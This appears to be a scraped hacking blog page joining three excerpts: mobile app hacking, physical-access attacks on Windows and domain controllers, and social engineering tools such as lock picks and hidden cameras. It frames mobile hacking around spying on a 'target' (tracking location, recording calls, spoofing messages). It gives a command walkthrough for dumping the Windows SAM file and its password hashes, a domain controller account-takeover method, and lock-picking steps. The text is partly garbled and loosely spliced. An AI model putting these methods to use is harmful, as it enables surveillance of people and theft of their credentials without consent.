Introduction to Mobile Hacking

 Mobile Hacking 

Mobile hacking makes perfect sense because of the rise of smartphone and other mobile devices for online transactions and connecting with others. Since mobile devices are hubs of personal information that are easier to access compared to personal computers, they are among the most vulnerable devices for hackers.

Most Common Question (Why should you hack mobile devices?)

• Know the location of a target through installed GPS service or cell ID tracking. 
• Get Access emails and record phone conversations 
• Know target’s internet browsing behavior 
• To View all contents stored in the device, including photos 
• Send remote instructions to the mobile device 
• Use it to send spoofed messages or calls

Mobile app hacking is among the fastest ways to infiltrate a mobile device system since it is easy to upload a malicious app online and make it possible for people to download the hack, without even thinking if they should examine their download or not. Mobile apps are also considered as “low-hanging fruit.” Most mobile apps can be directly accessed through their binary codes, or the code that mobile devices need in order to execute the app. That means that that everyone who has their hands on to marketed hacking tools are able to exploit available mobile apps and turn them into hacking tools. Once hackers are able to compromise a mobile app, they will be able to perform the initial compromise within minutes.


How hackers exploit binary codes in mobile apps?
Here Same Ways......

• Modify the code to modify behavior

When hackers modify the binary code, they do that to disable the app’s security controls, requirements for purchasing, or prompts for ads to display. 

• Inject malicious code

When hackers are able to get their hands on a binary code, they can inject a malicious code in it and then distribute it as an app update or a patch. Doing this can confuse a user into thinking that he is merely updating the app in his mobile devise, but in reality, the hacker has engineered the user into installing an entirely different app.

1.  Create a rogue app

Hackers can perform a drive-by attack, which is possible by doing an API/function hooking or swizzling. When this is done, the hacker will be able to successfully compromise the targeted application and make redirecting the traffic or stealing user credentials possible.

• Do reverse engineering

A hacker that has access to a binary code can easily perform a reverse-engineering hack to expose further vulnerabilities, do similar counterfeit apps, or even resubmit it under new branding.

Read More

Physical Access Attacks Hacking

 Physical Access Attacks

If an attacker is able to gain physical access to a machine, chances are that he'll hack it. In almost every OS or network device, there exists a “physical backdoor” which allows for manual resetting of a device configuration.

"Technologies used for perimeter security involve, for instance, intrusion detection sensors and alarm systems. In the context of cryptographic implementations, “physical attack” is understood as a term which encompasses all attacks based on physical means against cryptographic devices."

First we see  Resetting Microsoft Windows 

 Resetting Microsoft Windows 

As discussed before, Windows stores local user passwords in the SAM. The SAM is locked by Windows and can not be accessed, copied or read while Windows is running. However, if we were to boot the same computer with a different OS (say Linux), then the SAM file would no longer be protected. Our newly booted Linux OS would see the SAM file as just another file on the Windows files system. We can then modify the SAM with specialized tools and reset passwords to our liking. Once the Windows machine boots back up, it will have new passwords in its SAM database.

Here we see that the Windows NTFS partition SDA1 is mounted, with read only (ro) permissions. Since we need to change the SAM file, we will require read / write permissions. 

BT ~ # umount /mnt/sda1/ 

BT ~ # modprobe fuse 
BT ~ # ntfsmount /dev/sda1 /mnt/sda1/ 
BT ~ # mount 
tmpfs on / type tmpfs (rw) proc on /proc type proc (rw) sysfs on /sys type sysfs (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) usbfs on /proc/bus/usb type usbfs (rw) /dev/sda1 on /mnt/sda1 type fuse (rw,nosuid,nodev,default_permissions,allow_other) BT ~ #

Now we can dump the SAM file using BKHive and SAMdump

BT ~ # bkhive /mnt/sda1/WINNT/system32/config/system system.txt
Bkhive ncuomo@studenti.unina.it
Bootkey: dc155851060590ee807d3c660a437109 
BT ~ # samdump2 /mnt/sda1/WINNT/system32/config/sam system.txt >hashes.txt 
Samdump2 ncuomo@studenti.unina.it 
This product includes cryptographic software written by Eric Young (eay@cryptsoft.com)

No password for user Guest(501) 
BT ~ # cat Phashes.txt Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:::: NetShowServices:1001:4e239a9b2c8fca59049021d2a350c02c:021c54b8e10a4c420839b49a7cd21a66::: IUSR_WIN2KSP4:1003:76af34c719386a457aa40990e59dd60e:1c6560db5a2eb3f2da11bfd04d7c5a91::: IWAM_WIN2KSP4:1004:1cad3d74dee85109bb0b6cba129ef50e:7212a9f44e59a1b73d88fa7d670266db::: 

 we can modify the SAM using a use full tool such as chntpw:

Second Way is  Resetting a password on a Domain Controller

Resetting a password on a Domain Controller

Windows domain controllers do not store their user passwords in the local SAM, but in Active Directory. Active Directory can not be manually edited offline, so a different approach is taken. A Windows domain controller can be booted without Active Directory (Active Directory Restore Mode). This is usually done for Active Directory maintenance or defragmentation.  When Active Directory is not loaded, the domain controller will temporarily revert to local username authentication, and will once again use the SAM file present on the machine. A possible attack vector would be to reset/crack the Domain Controller's Local administrator password (By SAM manipulation or dumping) and then load it up in “Active directory restore mode” and log in with the modified / cracked password. Once logged in, a service is installed which executes the “net user” command (with SYSTEM privilages). Once the Domain Controller is rebooted and allowed to load Active Directory, the service adds/modifies the user and allows us to log in with our altered password. 

Third is Resetting a Cisco Device 

  Resetting a Cisco Device 

In Linux, a similar technique is used to reset root passwords. The machine is either booted in single mode or booted off a different operating system in order to manually change the /etc/shadow file.

More Info

Read More

The Tools of the Social Engineering

The Tools of the Social Engineering

(Man is a tool-using animal. Without tools he is nothing, with tools he is all. )

The social engineer’s tools category has the potential to be huge, but this book isn’t trying to become a manual on how to pick locks or spoof a phone number. Instead it is an attempt to give you enough information to decide what tools would augment your practice.When it comes to social engineering having a decent toolset can make or break the ability of the social engineer to be successful.

The first section we see, “Physical Tools,” focuses on things like lock picks, shims, and cameras.Here I provide some information on using phone spoofing in a social engineering attack, continues with a discussion of some of the best software-based information-gathering tools on the market, then ends with a discussion about password profiling tools.

• Physical Tools

Physical security is comprised of the measures that companies or people take to remain secure that do not involve a computer. It often involves locks, motion cameras, window sensors, and the like.

                                             First 

• Lock Picks

shows a very rough image of a simple lock.

A lock pick simulates the key in moving all the pins into the correct position one by one, allowing the lock to turn freely and open the door. You need two main tools to pick a lock: picks and a tension wrench. Picks are long pieces of metal that curve at the end, similar to a dentist’s tool. They reach inside the lock and move the pins up and down until they are in the right position.

To pick a lock, follow these steps:

• Insert the tension wrench into the keyhole and turn it in the same direction you would turn the key . The real skill here is knowing how much tension to add—use too much or too little, and the pins won’t fall into place, thus allowing the lock to turn. Providing just the right amount of tension creates a small ledge that offsets the plug enough to catch the pin shafts.
• Insert the pick and use it to lift the pins one by one until you feel them lock in place. You can hear a slight click when an upper pin falls into position. When you get all the pins into position the plug will rotate freely, and you will have picked the lock.

Business card–sized lock-pick set

 Pocketknife

Cameras and Recording Devices

Cameras and recording devices seem so “peeping Tom-i sh” that many times the question arises, “Why? Why use hidden cameras and covert recording devices in an SE gig?” Good question. It has a simple two-part answer: for proof and protection.

•  Let’s discuss the concept of proof. As already mentioned, a social engineering audit is where you are testing people. It is trying to help a company patch the human infrastructure to be more secure. 
• The second reason to use recording devices in an SE gig is for protection, mainly for the professional social engineers.

All of these devices capture audio and color video from a hidden camera except for the pen, which is an audio recorder.

Note:

In part Second We read same other tools and use of GPS Tracker and Same Online Information Gathering Tools  

Read More